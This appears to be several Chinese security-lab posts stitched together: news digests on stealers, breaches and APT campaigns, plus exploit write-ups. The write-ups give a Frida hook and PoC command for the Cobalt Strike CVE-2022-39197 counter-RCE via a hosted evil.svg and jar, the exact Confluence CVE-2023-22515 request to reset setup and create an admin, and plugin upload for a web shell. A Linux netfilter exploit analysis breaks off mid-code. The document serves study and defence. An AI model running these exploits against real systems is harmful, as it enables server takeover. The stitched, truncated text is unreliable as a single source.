1、研究人员发现新型窃密木马Rude Stealer https://cyble.com/blog/new-java-based-rude-stealer-abuses-directx-diagnostic-tool/ 研究人员最近发现了一种新型窃密木马Rude Stealer，该窃密木马使用Java进行编写。Rude Stealer从各种浏览器中提取数据，获取Discord令牌、Steam ID以及有关安装游戏的信息，同时具备获取屏幕截图的功能。此外，它利用DirectX诊断工具（DxDiag）提取系统详细信息，包括主机名、操作系统版本、BIOS信息等。 2、IT公司Appscook因系统配置错误泄露数据信息 https://securityaffairs.com/154743/security/app-used-by-hundreds-of-schools-leaking-childrens-data.html 研究人员发现IT公司Appscook的系统配置错误，导致其开发的应用程序泄露了大量敏感数据。DigitalOcean存储桶包含一百万个敏感文件，未经身份验证的任何人都可以进行访问，泄露的数据包括学生的姓名、父母的姓名、小学、初中和高中的学生照片、儿童所在学校的名称、出生证明、费用收据、学生成绩单/考试结果、家庭地址、电话号码。 3、研究人员在公共存储库中发现多家公司的敏感信息 https://blog.aquasec.com/the-ticking-supply-chain-attack-bomb-of-exposed-kubernetes-secrets 研究人员发现被上传到公共存储库的、编码的Kubernetes配置信息，并表示公开暴露的Kubernetes配置信息可能会使组织面临供应链攻击的风险。根据研究人员的说法，受影响的公司包括两家顶级区块链公司和其他一些500强公司。 4、海湾航空公司遭受网络攻击 https://www.reuters.com/business/aerospace-defense/gulf-air-exposed-data-breach-vital-operations-not-affected-2023-11-25 巴林新闻社（BNA）报道称，海湾航空公司表示其数据在11月24日遭到泄露，但其业务和关键系统未受影响。该公司表示，由于这次非法入侵，该公司的电子邮件系统和客户数据库的一些信息可能会受到损害，并已部署紧急计划以遏制这次入侵事件。 5、伊朗黑客劫持美国自来水公司的工业控制系统 https://www.securityweek.com/hackers-hijack-industrial-control-system-at-us-water-utility/ 宾夕法尼亚州阿利基帕市水务局证实，黑客周末控制了与升压站相关的系统，但表示供水不存在风险。 6、美英网络安全机构发布人工智能发展指南 https://www.ncsc.gov.uk/files/Guidelines-for-secure-AI-system-development.pdf 美国和英国网络安全机构 CISA 和 NCSC 为利用人工智能的系统开发人员发布了以安全为重点的指南。该文件名为《安全人工智能系统开发指南》，促进实施安全设计原则以及透明度和问责制，并优先考虑客户对安全结果的所有权。两家机构指出，这些指南适用于所有类型的人工智能/机器学习系统，无论是从头开始构建还是在第三方资源之上构建，以解决与人工智能、网络安全和关键基础设施相关的问题。该文件与20多个国内外网络安全组织合作制定，分为四个部分，涵盖人工智 7、乌克兰情报部门黑客入侵俄罗斯联邦航空运输局 Rosaviatsia https://securityaffairs.com/154839/cyber-warfare-2/ukraine-hacked-russia-rosaviatsia.html 乌克兰情报部门宣布，他们已经入侵了俄罗斯联邦航空运输局“Rosaviatsia”。这次攻击是复杂的特殊网络行动的结果。乌克兰国防情报局表示，由于在网络空间进行了一次成功的复杂特种行动， 俄罗斯交通部下属机构——联邦航空运输局（Rosaviatsia）的大量机密文件现已被获取。 8、KyberSwap 称 5470 万美元的加密货币在攻击中被盗 https://therecord.media/kyberswap-crypto-platform-54-million-hack 加密货币平台 KyberSwap 周五表示，在本周早些时候宣布的网络攻击中，价值约 5400 万美元的加密货币被盗。 9、通用电气疑被黑客入侵开发环境，泄露美国军事机密 https://www.freebuf.com/articles/384955.html 美国通用电气公司正在调查一名攻击者在网络攻击中侵入公司的开发环境，并泄露所谓被盗数据的指控。通用电气（GE）是一家业务涵盖电力、可再生能源及航空工业的美国跨国企业。本月早些时候，自称为IntelBroker的攻击者在一个黑客论坛上，试图以500美元的价格出售进入通用电气“开发和软件管道”的通道。在未能出售所谓的访问权限之后，该威胁行为者再次发布消息称，他们现在出售网络访问权限和被盗数据。该攻击者在黑客论坛上发帖称，“数据包括大量与DARPA（美国国防高级研究计划局）相关的军事信息、文件、SQL文件、文档 10、国内某企业2000多万条地图数据遭数据公司盗取 https://www.secrss.com/articles/60959 近期，在市局网安总队的指导下，普陀警方在纵深推进净网2023、砺剑2023等专项工作中，破获一起非法获取计算机信息系统数据案。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、攻击者通过虚假的浏览器更新向Mac用户传播Atomic窃密木马 https://www.malwarebytes.com/blog/threat-intelligence/2023/11/atomic-stealer-distributed-to-mac-users-via-fake-browser-updates Atomic窃密木马，又被称为AMOS，是针对macOS的一种窃密木马。研究人员近期发现，AMOS现在通过一个名为ClearFake的虚假浏览器更新攻击链针对Mac用户进行传播。ClearFake是一种利用受损网站分发虚假浏览器更新的新型恶意软件攻击活动，目前攻击者正在通过模仿称Safari、Chrome更新的虚假网站传播AMOS。AMOS窃 2、医疗服务提供商Welltok泄露850万患者的数据 https://www.bleepingcomputer.com/news/security/welltok-data-breach-exposes-data-of-85-million-us-patients/ Welltok称，在一次数据窃取攻击中，该公司使用的文件传输程序被黑客攻击，导致近850万名美国患者的个人数据曝光。Welltok称其MOVEit Transfer服务器于2023年7月26日遭到侵犯。在此次事件中，患者的个人数据被曝光，包括全名、电子邮件地址、物理地址和电话号码。对于一些人，还包括社会安全号码（SSN）、Medicare/Medicaid ID号码和某些健康保险信 3、开源3D设计软件Blender的服务器遭受DDoS攻击 https://www.bleepingcomputer.com/news/security/open-source-blender-project-battling-ddos-attacks-since-saturday/ Blender项目团队表示，自11月18日以来，blender.org服务器一直遭受DDoS攻击，攻击者通过向服务器发送过载的请求来使其宕机。Blender的首席运营官分享的统计数据显示，攻击仍在进行中，已有超过2.4亿个虚假请求指向该项目的服务器。目前尚不清楚攻击者的意图以及动机。 4、汽车零件巨头 AutoZone 披露 MOVEit 遭黑客攻击后数据泄露 https://securityaffairs.com/154633/data-breach/autozone-data-breach-after-moveit-hack.html AutoZone 透露，网络犯罪分子利用 MOVEit Transfer 托管文件传输应用程序中的漏洞窃取了包括社会安全号码在内的信息。然而，该公司尚不清楚所暴露的信息被用于欺诈的情况。 5、与朝鲜有关的 APT 组织利用CyberLink发起供应链攻击 https://securityaffairs.com/154652/apt/diamond-sleet-supply-chain-attack-cyberlink.html 微软威胁情报研究人员发现，与朝鲜有关的 APT Diamond Sleet (ZINC) 发起的供应链攻击涉及 CyberLink 软件的木马变体。攻击者使用了合法讯连科技应用程序安装程序的恶意软件版本，该安装程序使用颁发给讯连科技公司的有效证书进行签名。该安装程序托管在软件公司讯连科技拥有的合法更新基础设施上，并包括限制执行时间窗口的检查并逃避安全产品的检测。 6、Lumma 恶意软件可以恢复过期的 Google 身份验证 Cookie https://www.bleepingcomputer.com/news/security/lumma-malware-can-allegedly-restore-expired-google-auth-cookies/ Lumma 信息窃取恶意软件（又名“LummaC2”）正在推广一项新功能，据称该功能允许网络犯罪分子恢复过期的 Google cookie，该 cookie 可用于劫持 Google 帐户。 7、Microsoft 推出 Defender 赏金计划，最高奖励20,000 美元 https://www.bleepingcomputer.com/news/microsoft/microsoft-launches-defender-bounty-program-with-20-000-rewards/ Microsoft推出了一项针对Microsoft Defender安全平台的新漏洞赏金计划，奖励在500美元至20,000美元之间。 8、黑客利用Apache ActiveMQ漏洞部署Linux Rootkit https://thehackernews.com/2023/11/kinsing-hackers-exploit-apache-activemq.html Kinsing 威胁行为者正在积极利用易受攻击的 Apache ActiveMQ 服务器中的关键安全漏洞，用加密货币矿工和 rootkit 感染 Linux 系统。 9、MOVEit黑客攻击已经波及2600多家企业 https://www.secrss.com/articles/61023 根据新西兰网络安全公司Emsisoft的最新报告，今年5月以来，文件传输服务MOVEit遭黑客攻击后波及了约2620家企业用户和7720万人。 10、I Doc View在线文档预览系统存在代码执行漏洞 https://www.secrss.com/articles/60990 近日，奇安信CERT监测到I Doc View在线文档预览系统代码执行漏洞(QVD-2023-45061)，远程未经身份验证的攻击者可通过构造特殊请求，目标应用将下载恶意文件，成功利用此漏洞可能在目标服务器上执行任意代码。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

前言 Cobalt Strike 使用 GUI 框架 SWING（一种java GUI的库）开发，攻击者可通过CS木马在 beacon 元数据中注入恶意 HTML 标签，使得Cobalt Strike对其进行解析并且加载恶意代码（类似XSS攻击），从而在目标系统上执行任意代码。 实现原理 攻击者需要通过CS木马在 beacon 元数据中注入恶意payload，恰好Frida 可以用于钩入和修改各种函数，包括 Windows API 函数，这里反制主要通过使用Frida框架钩入Windows API函数，从而对beacon 元数据中注入恶意代码，以下是一些你可以通过 Frida 钩入的 Windows API 函数的示例 Kernel32.dll: CreateFileW ReadFile WriteFile FindFirstFileW CreateProcessW GetProcAddress LoadLibraryW VirtualAlloc VirtualProtect Advapi32.dll: RegOpenKeyExW RegQueryValueExW RegSetValueExW GetUserNameA User32.dll: MessageBoxW SetWindowTextW GetWindowTextW Gdi32.dll: TextOutW CreateFontIndirectW Shell32.dll: ShellExecuteW Ws2_32.dll: send recv 在 Frida 中，你可以使用 Interceptor.attach 方法来附加到这些函数并添加你自己的处理逻辑。这样，你就可以在这些函数被调用时执行自定义代码，此时也意味着你可以对 beacon 元数据中注入自定义代码了。 例如Kernel32.dll:中的Process32Next # Frida 框架来拦截 kernel32.dll 中的 Process32Next 函数，该函数用于遍历进程列表 var pProcess32Next = Module.findExportByName("kernel32.dll", "Process32Next") # 使用Interceptor.attach方法附加到 Process32Next 函数，以下为自己的处理逻辑 Interceptor.attach(pProcess32Next, {   onEnter: function(args) {       this.pPROCESSENTRY32 = args[1];       if(Process.arch == "ia32"){           this.exeOffset = 36;       }else{           this.exeOffset = 44;       }       this.szExeFile = this.pPROCESSENTRY32.add(this.exeOffset);   },   onLeave: function(retval) {       if(this.szExeFile.readAnsiString() == "target") {           send("[!] Found beacon, injecting payload");           this.szExeFile.writeAnsiString(payload);       }   } }) 函数内整体逻辑拆开来分析下 处理函数进入 onEnter onEnter: function(args) {   this.pPROCESSENTRY32 = args[1];   if(Process.arch == "ia32"){       this.exeOffset = 36;   }else{       this.exeOffset = 44;   }   this.szExeFile = this.pPROCESSENTRY32.add(this.exeOffset); }, 在函数进入时，保存 Process32Next 函数的参数，并计算 szExeFile 的地址。szExeFile 是一个指向进程信息结构体的字段，其中包含进程的可执行文件名 处理函数离开 onLeave onLeave: function(retval) {   if(this.szExeFile.readAnsiString() == "target") {       send("[!] Found beacon, injecting payload");       this.szExeFile.writeAnsiString(payload);   } } 在函数离开时，检查 szExeFile 中的进程可执行文件名是否等于字符串 "target"。如果相匹配，将指定的 payload 写入进程的可执行文件名里，使得Cobalt Strike对其进行解析并且加载payload 简单来说就是注入Windows API修改tasklist返回的进程名，将进程名改写成攻击payload，当攻击者点击beacon执行列出进程时，只要他浏览到带有payload的进程名，就会执行反制RCE 反制复现 环境准备： 注：受到反制影响的Cobalt Strike版本< 4.7.1（全局禁止html渲染的Cobalt Strike不受印影响） 开源POC和EXP：https://github.com/its-arun/CVE-2022-39197 1、编辑恶意文件内容 修改Exploit.java，更改exec内代码参数为要执行的命令，我这里为了直观展示则执行powershell一句话上线CS 2、编译文件 使用IDEA+maven进行编译，编译完成后会在target目录下生成EvilJar-1.0-jar-with-dependencies.jar文件，具体如下 3、将生成的恶意jar文件和svg文件放在同一路径下 将红队发送的木马样本放在与cve-2022-39197.py脚本同一路径下 4、蓝队在serve路径下开启一个web服务 5、编辑evil.svg文件，替换为当前路径启用的恶意jar的web地址 6、执行POC脚本 python3 cve-2022-39197.py artifact.exe http://192.168.108.248:9999/evil.svg 运行后，红队的cs客户端上可以看到此时木马已经成功上线 当红队尝试获取用户会话的进程列表，当滚动进程列表进行查看当前会话所在进程名时即触发（若未触发可能需要手动点击或触发存在延迟），请求蓝队web服务上的evil.svg文件，而evil.svg文件又继续加载请求恶意文件EvilJar-1.0-jar-with-dependencies.jar 成功上线蓝队CS，从而达到反制RCE 思考 除了以上Kernel32.dll:中的Process32Next函数的反制思路，其实还有很多其他的反制思路，正如Windows API 函数之多。我们还可以尝试Kernel32.dll:中的FindFirstFileW函数（根据文件名查找文件的函数），大概情况就是注入Windows API 修改返回的文件名，将文件名改写成攻击payload，当攻击者点击beacon执行列出文件时，只要他浏览到带有payload的文件名，就会执行反制RCE，以下就直接展示上线的效果（复现步骤和上面一样） 最后 此Cobalt Strike反制虽然是一个去年曝光的漏洞了，但是基数上还是会有许多人在使用着存在漏洞的Cobalt Strike版本，对应地Cobalt Strike的反制可玩性还是很高的，师傅们发挥想象可以让对手猝不及防。

1、8Base勒索团伙使用SmokeLoader传播Phobos勒索软件 https://blog.talosintelligence.com/deep-dive-into-phobos-ransomware/ 研究人员最近发现由8Base团伙发起的攻击活动有所增加，该团伙使用SmokeLoader木马传播Phobos勒索软件。SmokeLoader采用了多层解密的方式释放最终载荷文件。在初始阶段，SmokeLoader采用大量随机API调用来混淆执行流程，然后在内存中执行Shellcode并释放执行最终的载荷。Phobos是一种典型的勒索软件，能够在受感染的系统中建立持久性、执行快速加密并删除备份。2019年以后出现的Phobos勒索软件使用自定义的AES-25 2、研究人员发现针对印度用户的恶意安卓应用程序 https://www.microsoft.com/en-us/security/blog/2023/11/20/social-engineering-attacks-lure-indian-users-to-install-android-banking-trojans/ 研究人员近期发现针对印度用户的新一轮网络钓鱼攻击活动。攻击者利用WhatsApp和Telegram等社交媒体平台发送消息，试图通过冒充合法机构，如银行、政府服务和公用事业，诱使用户在其移动设备上安装恶意应用。一旦安装了这些恶意的应用程序，它们就会要求受害者输入他们的银行账户信息、借记卡PIN、PAN卡号码和在线银行凭据， 3、汽车配件零售商AutoZone证实其数据泄露 https://www.bleepingcomputer.com/news/security/auto-parts-giant-autozone-warns-of-moveit-data-breach/ AutoZone通知美国当局，称其在2023年5月28日的网络攻击中遭遇了数据泄露事件，导致18.5万人的数据遭到泄露。AutoZone发现未经授权的第三方利用与MOVEit相关的漏洞，从支持MOVEit应用程序的AutoZone系统中窃取了某些数据。Clop勒索团伙今年早些时候对AutoZone发动了一次攻击，并于2023年7月7日发布了他们声称从该公司窃取的数据。该团伙泄露的数据大约有1 4、法兰西岛公共卫生服务机构（SIAAP）遭受网络攻击 https://therecord.media/paris-wastewater-agency-hit-cyberattack 法兰西岛公共卫生服务机构（SIAAP）遭受网络攻击，该机构表示，在发现网络攻击后已向司法警察和法国国家信息和自由委员会（CNIL）提出了投诉。IT团队已切断了所有外部连接，以防止攻击蔓延。目前尚未有黑客组织声称发动此次攻击，但对于以持有敏感客户信息的关键服务机构为目标的勒索软件团伙而言，水务部门一直是其主要目标。 5、基于Mirai的新僵尸网络InfectedSlurs利用零日漏洞破坏NVR和路由器 https://securityaffairs.com/154607/malware/infectedslurs-botnet.html Akamai 发现了一种新的基于 Mirai 的 DDoS 僵尸网络，名为 InfectedSlurs，它积极利用两个零日漏洞来感染路由器和录像机 (NVR) 设备。 6、企业软件提供商 TmaxSoft 泄露 2TB 数据 https://securityaffairs.com/154567/data-breach/tmaxsoft-leaks-2tb-of-data.html TmaxSoft 是一家开发和销售企业软件的韩国 IT 公司，已泄露超过 5000 万条敏感记录。2TB 容量的 Kibana 仪表板已经曝光两年多了。Cybernews 研究人员早在 2023 年 1 月就发现了它，并指出这组数据于 2021 年 6 月首次发现。 7、CITRIX 提供了其他措施来解决 CITRIX BLEED 问题 https://securityaffairs.com/154546/hacking/citrix-bleed-attacks.html Citrix 正在为针对CVE-2023-4966 “ Citrix Bleed ”漏洞修补 NetScaler 设备的管理员提供额外措施。该公司敦促管理员删除所有活动用户会话并终止所有持久会话。 8、指纹传感器漏洞可让攻击者绕过 Windows Hello 登录 https://thehackernews.com/2023/11/new-flaws-in-fingerprint-sensors-let.html 一项新的研究发现了多个漏洞，这些漏洞可被用来绕过Dell Inspiron 15、Lenovo ThinkPad T14 和 Microsoft Surface Pro X 笔记本电脑上的Windows Hello 身份验证。这些缺陷是由硬件和软件产品安全和攻击性研究公司 Blackwing Intelligence 的研究人员发现的，他们发现了嵌入到设备中的 Goodix、Synaptics 和 ELAN 指纹传感器的弱点。 9、NetSupport RAT 感染呈上升趋势 - 针对政府和商业部门 https://thehackernews.com/2023/11/netsupport-rat-infections-on-rise.html 威胁行为者使用名为 NetSupport RAT 的远程访问木马瞄准教育、政府和商业服务部门。 10、中国台湾大江生医集团236.3GB数据在暗网泄露 https://www.secrss.com/articles/61002 据知道创宇暗网雷达监测，大江生医集团数据泄露，文件大小 236.3 GB，包含 104,001 个文件。大江生医股份有限公司是中国台湾地区的企业，全球500强上市公司，成立于1980年，是一家生物整合设计公司，集团下设有四大生产中心，分别坐落在中国台湾、中国上海，以及美国、日本。目前有大江生医、上海百岳特、大江生活、光腾新药、和康生技、沛富生技等多家子公司。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

0x01 漏洞描述 Confluence 是由 Atlassian 开发的企业级协作软件。2023年10月，Atlassian 官方披露 CVE-2023-22515 Atlassian Confluence Data Center & Server 权限提升漏洞。攻击者可构造恶意请求创建管理员，从而登录系统，造成敏感信息泄漏等。 如果 Confluence 站点托管在 Atlassian Cloud(域名为：atlassian.net)，则不受此漏洞影响。 0x02 影响版本 8.0.0 - - 8.0.4 8.1.0 - - 8.1.4 8.2.0 - - 8.2.3 8.3.0 - - 8.3.2 8.4.0 - - 8.4.2 8.5.0 - - 8.5.1 0x03 环境搭建 安装包 https://www.atlassian.com/software/confluence/download-archives jar 包： https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-8.5.1.zip   https://product-downloads.atlassian.com/software/confluence/downloads/atlassian-confluence-8.5.2.zip 大致的安装可以看 https://cn-sec.com/archives/2177640.html 其中有一步数据库的安装会存在一些问题，首先是新建数据库的时候，对编码有要求 CREATE DATABASE confluence CHARACTER SET utf8mb4 COLLATE utf8mb4_bin; 随后是连接 jdbc:mysql://localhost/confluence?sessionVariables=transaction_isolation='READ-COMMITTED' 在配置数据库时需要指定 READ-COMMITTED 下一步是做调试准备，这里的调试需要找到 Service 随后在 cmd 里面运行这一个行命令，就会跳出如图所示的框框 tomcat9w.exe //ES//Confluence151123100612 随后添加 JAVA_OPTS，进行动调 0x04 漏洞分析 根据官方的公告，修复建议是给 /setup 打头的接口做鉴权校验 <security-constraint>      <web-resource-collection>        <url-pattern>/setup/*</url-pattern> <http-method-omission>*</http-method-omission> </web-resource-collection>      <auth-constraint /> </security-constraint> 由于 Confluence 这里的框架是基于 S2 的，S2 的大致流程如 su18 师傅的图所示 也就是说我们现在需要去找一下 /setup/* 接口是怎么被处理的，直接分析是比较难的，所以先 diff 一下代码。 首先 struts2.xml 里面 修复版本新增了 struts.override.acceptedPatterns 修复版本删除了 server-info action 接着是 BootstapStatusProviderImpl 类里面增加了部分内容，对属性 setupPersister 和 applicationConfig 做了限制 这里有点没看懂修了什么，所以我先动调观察具体接口是怎么处理的，根据 Struts2 的特性，去到 struts.xml 里面找对应的 Interceptor，不难找到具体处理的拦截器是 SetupCheckInterceptor 开始动调，看一下 /setup/setupadministrator.action 接口的逻辑是怎么处理的。 中间走到 com.atlassian.config.ApplicationConfig#isSetupComplete 时，在新版本的 fix 里面是增加了这一段的 ReadOnlyApplicationConfig 配置的 所以这里的漏洞利用思路大概就是先动态修改 setupPersister 或 applicationConfig，在触发了这一点之后，能够下一步访问 /setup/setupadministrator.action，重新配置管理员密码。 这里具体的实现很有意思，su18 师傅的文章说的很明白，我就直接拿过来用了 https://su18.org/post/struts2-1/OGNL 中的根对象即为 ValueStack（值栈），这个对象贯穿整个 Action 的生命周期（每个 Action 类的对象实例会拥有一个 ValueStack 对象）。当Struts 2接收到一个 .action 的请求后，会先建立Action 类的对象实例，但并不会调用 Action 方法，而是先将 Action 类的相应属性放到 ValueStack 的实现类 OgnlValueStack 对象 root 对象的顶层节点（ ValueStack 对象相当于一个栈）。在处理完上述工作后，Struts2 就会调用拦截器链中的 我们需要找一个 OGNL 的点, 并且这个点能够以某种方式去调用某个类的 getter / setter, 以此来配置 applicationConfig 的 setupComplete 字段 于是去 diff 跟 Struts2 有关的依赖, 即 com.atlassian.struts2_struts-support-1.1.0.jar 和 com.atlassian.struts2_struts-support-1.2.0.jar 发现修改的类是 SafeParametersInterceptor，这个类会处理所有的输入，所以 server-info.action 这个请求也会经过它 同时，Confluence 使用了 XWork 框架，它允许通过 HTTP 请求来设置 Java 对象的参数：https://developer.atlassian.com/server/confluence/xwork-plugin-complex-parameters-and-security/ XWork allows the setting of complex parameters on an XWork action object. For example, a URL parameter of formData.name=Charles will be translated by XWork into the method calls getFormData().setName("Charles") by the XWork parameters interceptor. If getFormData() returns null, XWork will attempt to 这就允许我们在输入时候传参类似于 ?test=a.b.c，动调一下 http://192.168.80.137:8090/server-info.action?a.b.c 这里会先做过滤，跟进 this.filterSafeParameters() 方法，该方法会对传入的参数进行判断，如果包含关键字或者满足正则匹配则返回 false BLOCKED_PARAMETER_NAMES: actionErrors、actionMessages   EXCLUDE_CLASS_PATTERN: .*class[^a-z0-9_].*   SAFE_PARAMETER_NAME_PATTERN: \w+((\.\w+)|(\[\d+\])|(\['[\w.]*'\]))*   MAP_PARAMETER_PATTERN: .*\['[a-zA-Z0-9_]+'\] 如果不在黑名单内，最后会调用 isSafeComplexParameterName() 方法，这个方法会检查传入的参数是否调用了当前 action 的某个 getter / setter，如果调用了，则判断里面是否有 ParameterSafe 注解。 如果没有实现 @ParameterSafe 注解，那么 isSafeMethod 就会返回 false 这么一看，漏洞成立需要绕过黑名单验证，并且满足 @ParameterSafe 注解，利用条件十分苛刻。继续往下走，回到 com.atlassian.xwork.interceptors.SafeParametersInterceptor#doIntercept，跟进 super.doIntercept() 方法。能够看到这里是跟进到了 com.opensymphony.xwork2.interceptor.ParametersInterceptor#doIntercept 方法，它会重新处理一遍参数，这就导致上面的黑名单完全没生效。 跟进 setParameters() 方法后其实就是 S2 处理 OGNL 语句的那一套，参考 https://drun1baby.top/2022/10/27/Java-Struts2-%E7%B3%BB%E5%88%97-S2-001/#%E6%B5%81%E7%A8%8B%E5%88%86%E6%9E%90 总的来说, 因为 SafeParametersInterceptor.doIntercept() 方法的一些逻辑问题, 导致这个类自身对传入参数的过滤并没有生效, 我们最终还是可以通过 a.b.c=e 的形式去调用当前 action 的 getter / setter, 并不需要关心方法本身或者它的 returnType 是否使用了 @ParameterSafe 注解 到这里思路就很清晰了，我们只需要构造 OGNL 即可，调用某个 Action 里的 setter，让 isSetupComplete=false 即可 以 ServerInfoAction 为例, 它继承自 ConfluenceActionSupport 这里的 getBootstrapStatusProvider() 方法调用了 BootstrapStatusProviderImpl.getInstance()，接下来就可以去 BootstrapStatusProviderImpl 里面寻找调用链，可惜的是这里的 setSetupComplete() 已经用不了了，只能找另外的 最终找到的是 getApplicationConfig() 方法，而在 ApplicationConfig 类里面存在 setSetupComplete() 方法可用 因为 Confluence 的所有 Action 都继承自 ConfluenceActionSupport, 所以理论上只要访问任意一个使用了 SafeParameterInterceptor 的路由, 无论是 GET 还是 POST 方法都能够利用成功 于是最后的 PoC 应该是 http://192.168.80.137:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false 在进行覆盖 setupComplete=false 之后重新注册管理员 http://192.168.80.137:8090/setup/setupadministrator-start.action 0x05 未授权之后的 RCE X1r0z 师傅已经介绍了一种 RCE 的方法，但是利用条件有限，需要 web目录可写并且高权限用户 其实有一种更简单的方法，看到：https://packetstormsecurity.com/files/175225/Atlassian-Confluence-Unauthenticated-Remote-Code-Execution.html 可以通过上传插件实现 RCE，利用工具github上已经存在了：https://github.com/AIex-3/confluence-hack/ http://192.168.80.137:8090/plugins/servlet/upm 上传 plugin_shellplug.jar，访问 /plugins/servlet/com.jsos.shell/ShellServlet

1、研究人员发现LittleDrifter USB蠕虫在多个国家传播 https://research.checkpoint.com/2023/malware-spotlight-into-the-trash-analyzing-litterdrifter/ Gamaredon，也被称为Shuckworm、Iron Tilden和Primitive Bear，是与俄罗斯相关的APT组织。研究人员称，LittleDrifter蠕虫是用VBS编写的，旨在通过USB驱动器进行传播，是Gamaredon组织的USB PowerShell蠕虫的演进变种。研究人员在美国、乌克兰、德国、越南、波兰、智利看到了该蠕虫入侵的迹象，这表明Gamaredon组织可能失去了对Litt 2、Kinsing组织利用CVE-2023-46604漏洞进行攻击活动 https://www.trendmicro.com/en_us/research/23/k/cve-2023-46604-exploited-by-kinsing.html Kinsing组织正在利用Apache ActiveMQ RCE漏洞（CVE-2023-46604）进行攻击活动，该组织在易受攻击的系统上执行挖矿程序和恶意软件。在启动挖矿程序之前，Kinsing通过终止任何相关进程、crontabs和网络连接来检查机器上是否有其他的Monero挖矿程序。之后，它通过cronjob建立持久性，该cronjob用于获取其感染脚本的最新版本，并将rootkit添加到'/etc/ld.so. 3、加拿大政府证实其供应商被攻击并泄露数据 https://www.bleepingcomputer.com/news/security/canadian-government-discloses-data-breach-after-contractor-hacks/ 加拿大政府表示，其两家承包商已被黑客攻击，入侵事件发生在上个月，影响到Brookfield Global Relocation Services（BGRS）和SIRVA Worldwide Relocation & Moving Services，它们都是为加拿大政府雇员提供搬迁服务的供应商。尽管加拿大政府尚未确定此事件的攻击者，但LockBit勒索团伙称入侵了SIRV 4、BlackCat勒索团伙称对无人机公司AFT进行攻击 https://thecyberexpress.com/autonomous-flight-technologies-data-breach/ BlackCat勒索团伙声称对无人机公司Autonomous Flight Technologies（AFT）进行攻击，并称将窃取的数据出售给了一家未透露名称的国外机构。该公司尚未发布有关此次事件的官方声明或回应，并且由于攻击者未透露更加具体的细节，因此关于此次攻击事件的真实性还不确定。 5、谷歌分享了在 Chrome 中阻止第三方 cookie 的计划 https://www.bleepingcomputer.com/news/google/google-shares-plans-for-blocking-third-party-cookies-in-chrome/ 谷歌已正式宣布计划逐步消除第三方 cookie，以实现其隐私沙盒计划的一个关键方面。预计从 2024 年初1% 用户测试期开始，最终在 2024 年第三季度进行更广泛的淘汰。 6、FTC 发起语音克隆挑战以打击人工智能欺诈 https://cybernews.com/privacy/ftc-voice-cloning-challenge-ai-fraud/ 美国联邦贸易委员会 (FTC) 发起了首届“语音克隆挑战赛”，以应对人工智能语音克隆诈骗日益增长的威胁。 7、三星证实黑客在长达一年时间内窃取了英国客户的个人数据 https://techcrunch.com/2023/11/16/samsung-hackers-customer-data-breach/ 三星证实黑客在长达一年时间内窃取了英国客户的个人数据。三星向受影响客户发送邮件称，攻击者利用了未披露名字的第三方应用的漏洞，在 2019 年 7 月 1 日到 2020 年 6 月 30 日之间访问了在三星英国商店购物的客户个人信息。 8、Tor 网络删除了许多与加密货币相关的中继 https://www.securityweek.com/tor-network-removes-risky-relays-associated-with-cryptocurrency-scheme/ Tor 项目周一宣布，它已经删除了许多中继，因为它们对网络的完整性和用户构成了高风险。匿名网络维护者发布的一篇博客文章显示，目录当局已投票赞成删除与涉及加密货币代币支付的营利计划相关的中继。 9、勒索团伙利用海康威视综合安防管理平台漏洞开展大规模勒索攻击 https://x.threatbook.com/v5/article?threatInfoID=97086 近日，微步监测到有勒索团伙利用海康威视综合安防管理平台文件上传漏洞（XVE-2023-23734）开展大规模勒索攻击。攻击者利用该漏洞上传Webshell，并随后执行任意命令，对主机上相关文件进行加密，加密后缀为locked1。该漏洞利用成本极低，危害极高。该漏洞非0day，海康威视已于2023年6月修复。 10、多地出现“电话手表兑换卡”新型诈骗，警方提醒若捡到要直接销毁 https://www.ithome.com/0/733/581.htm 据“平安北京”公众号，近日全国多地有不少人捡到一张“电话手表兑换卡”，印有 300 元面值，还有“安全守护”“防走失儿童定位智能电话手表”等字样。经多地警方向中国移动公司求证核实，近期中国移动并未推出此类活动。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

前言 在https://mp.weixin.qq.com/s/SnPaqVJ7HyQ4yur6p5dhLg中，分析了漏洞的成因，接下来分析漏洞的利用。 漏洞利用 根据漏洞成因可以知道，payload_eval_copy_vlan函数存在整型溢出，导致我们将vlan头部结构拷贝到寄存器（NFT_REG32_00-NFT_REG32_15），而该变量时存在与栈上的，因此可以覆盖栈上的其余变量的。 可以发现regs变量是无法覆盖到返回地址。 因此我们需要观察源码，jumpstack变量是在regs变量下方 我们可以通过溢出regs变量覆盖到jumpstack变量。 那么接下来需要观察一下nft_jumpstack结构体中存在哪些变量 struct nft_jumpstack { const struct nft_chain *chain; const struct nft_rule_dp *rule; const struct nft_rule_dp *last_rule; }; chain：用于指定在哪个流程进行hook rule：以什么样的规则处理数据包 last_rule：规则可能不止一条，因此last_rule用于指向最后一条规则 nft_jumpstack结构体在nft_do_chain函数的作用如下，当状态寄存器被设置为JUMP条件时，意味着需要跳转到其他chain进行处理，因此需要先保存当前chain的状态，这里与函数调用时保存栈时的处理一样，估计因此才命名为jumpstack。并且使用一个全局变量stackptr用于确定保存的chain的先后顺序。在保存完之后，就跳转到目的chain，目的chain则是存储在regs.verdict.chain中。 ... switch (regs.verdict.code) { case NFT_JUMP: if (WARN_ON_ONCE(stackptr >= NFT_JUMP_STACK_SIZE)) return NF_DROP; jumpstack[stackptr].chain = chain; jumpstack[stackptr].rule = nft_rule_next(rule); jumpstack[stackptr].last_rule = last_rule; stackptr++; case NFT_GOTO: chain = 